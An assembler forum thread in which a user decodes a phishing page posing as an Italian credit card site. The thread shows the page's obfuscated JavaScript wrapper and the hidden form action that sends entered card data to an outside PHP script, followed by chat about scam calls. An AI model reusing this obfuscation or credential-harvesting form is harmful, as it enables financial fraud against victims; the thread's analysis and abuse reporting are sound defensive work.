News:

MASM32 SDK Description, downloads and other helpful links
MASM32.com New Forum Link
masmforum WebSite

Phishers attacking....

Started by jj2007, February 11, 2012, 07:15:10 AM

Previous topic - Next topic

jj2007

Got this as an attachment to an email asking to update my credit card info (conto on-line.shtml, attached):
<Script Language='Javascript'>
<!-- HTML Encryption provided by CartaSi S.p.A. -->
<!--
document.write(unescape('%3C%21...6D%6C%3E%0A'));
//-->
</Script>

88k of escape sequences... no problem :green2

include \masm32\MasmBasic\MasmBasic.inc   ; download
   Init
   Let esi=FileRead$("conto on-line.shtml")
   Let edi=New$(LastFileSize)
   xor ecx, ecx
   .if Instr_(esi, "unescape")   ; unescape('%3C%21...6D%6C%3E%0A'
      lea ebx, [edx+11]
      .Repeat
         Let Mid$(esi, ebx+2)="h"   ; replace the % with an h
         lea eax, [esi+ebx-1]
         void Val(Mid$(esi, ebx, 3))   ; convert e.g. 3Ch
         .Break .if edx!=0203h   ; dh=2 means valid Hex$, dl=3 means 3 bytes used
         add ebx, 3
         mov [edi+ecx], al
         inc ecx
      .Until 0
   .endif
   FileWrite "test.txt", edi
   Inkey Str$("test.txt written, %i bytes", ecx)
   Exit
end start

It turns out that the file is full of references to the valid cartasi site, plus one that doesn't fit the picture:

form name="theForm" id="theForm" action="http://static.55.110.46.78.clients.your-server.de/icons/small/more1.php" method="POST"

So your-server.de got a mail, and their automated service created a response. We'll see :bg
What I don't understand is that this fight against phishing cannot be automated, it's so easy, and so obviously fraud ::)

sinsi

Light travels faster than sound, that's why some people seem bright until you hear them.

jj2007

Quote from: sinsi on February 11, 2012, 07:30:05 AM
GIGO?

What's that, a scrambled version? Every second char increased by one? :bg

sinsi

Your code, your zip, you tell me :P
Light travels faster than sound, that's why some people seem bright until you hear them.

jj2007

Quote from: sinsi on February 11, 2012, 08:17:28 AM
Your code, your zip, you tell me :P

Sinsi, my friend, either you are pulling my leg, or you are using a strange version of MB. AFAIK this stuff has worked for ages. Can you zip your exe and post it please? Thanks.

I attach the full source code and my exe.

sinsi

OK with the latest masm32 and masmbasic I get a html document.
Do you mean to tell me that masmbasic has bugs?  :bg
You're as bad as microsoft, always having to update things...jk
Light travels faster than sound, that's why some people seem bright until you hear them.

jj2007

Quote from: sinsi on February 11, 2012, 09:48:03 AM
OK with the latest masm32 and masmbasic I get a html document.
Do you mean to tell me that masmbasic has bugs?  :bg
You're as bad as microsoft, always having to update things...jk

MasmBasic has no bugs, only features :green
(but your version must have been prehistoric - definitely more than one year old :wink)

oex

Quote from: jj2007 on February 11, 2012, 11:21:46 AM
(but your version must have been prehistoric :wink)

How old are you JJ?
We are all of us insane, just to varying degrees and intelligently balanced through networking

http://www.hereford.tv

jj2007

Quote from: oex on February 11, 2012, 11:28:35 AM
Quote from: jj2007 on February 11, 2012, 11:21:46 AM
(but your version must have been prehistoric :wink)

How old are you JJ?

Some months less than Bill Gates. I produce less bugs :8)

vanjast

As everyone should know...
If you get a phone call, email, post with anything regarding private/personal/financial information.. You just put the phone down, delete email or burn the post, after taking note of it's details, for the authorities.

I get lots of phone calls with some woshead on the other side, who always make the mistake of getting my name wrong in various forms of phuggitup.
I just reply.. "You're bre--akin.. up.. hel  hell  o",  and put the phone down

I got this phone call from this one woman and I was in a good sadistic mood so I was nice and polite
She didn't drop the punchline until the very end 5 minutes of rambling on about everything except the money.
She had booked my place for me and asked what time I'd arrive... to which I replied that I will not be arriving.
Why.. with all the good deals she said. I said that all I wanted to do, was see how long she'd take to ask me for money, of which she would not be getting a cent.
The line was cut very quickly.....  :bg :bg

hutch--

Do you guys ever get this one, a phone call from someone with a very heavy Dephi Call Centre accent claiming to be the Computer Maintainance Department with Microsoft certification ?

I cannot repeat my response as this is a wholesome and respectable venue for assembler programmers but it does the job in less than 5 seconds.  :bg
Download site for MASM32      New MASM Forum
https://masm32.com          https://masm32.com/board/index.php

anunitu

I have from time to time had to deal with sales people,and I am a bit intimadating for them. I came home one day to find my Ex. with a HIGH pressure sales guy. She is a polite person,and the sales people use your politeness against you. I do not suffer from feeling I must be polite. The sales guy got this from me. "What the F*** are you doing in my house?"..He got this strange look on his face,and tried to go into his speil..I just went into my BAMF(Bad A** MotherF***) persona,and kicked him out. Most people are trained in their life to not be agressive when you are talking with someone,and these people will use that to Manipulate you. Like Hutch,I can't post my exact words because we are a polite group of educated programmers... :bdg

sinsi

Quote from: hutch-- on February 11, 2012, 01:15:13 PM
Do you guys ever get this one, a phone call from someone with a very heavy Dephi Call Centre accent claiming to be the Computer Maintainance Department with Microsoft certification ?

I cannot repeat my response as this is a wholesome and respectable venue for assembler programmers but it does the job in less than 5 seconds.  :bg

Sad to say I have had quite a few jobs where the customer get so far, think something's fishy, hang up then call me out, just in case.
They get remote control of your computer - with your permission - and install free software, then try to charge you for it.
One old bloke (in his 80s) actually signed up for a 'lifetime support' plan, around $300, since he thought it was good value.
I convinced him that it was a scam and to call his bank to cancel it.

heh, they called my sister 6 times in 2 weeks, she has no internet and no computer. Even when she told them they still went on and on...she leaves the phone on the counter
and hangs it up when she remembers to check, an hour later. The number actually shows up as a sydney (02) number here even though it's overseas. Thought you couldn't
spoof a CND in aus?
Light travels faster than sound, that's why some people seem bright until you hear them.

vanjast

Quote from: hutch-- on February 11, 2012, 01:15:13 PM
I cannot repeat my response as this is a wholesome and respectable venue for assembler programmers ... :bg
I'm really flattered that you think so highly of us...

Do carry on..!!  I'm all ears
:green2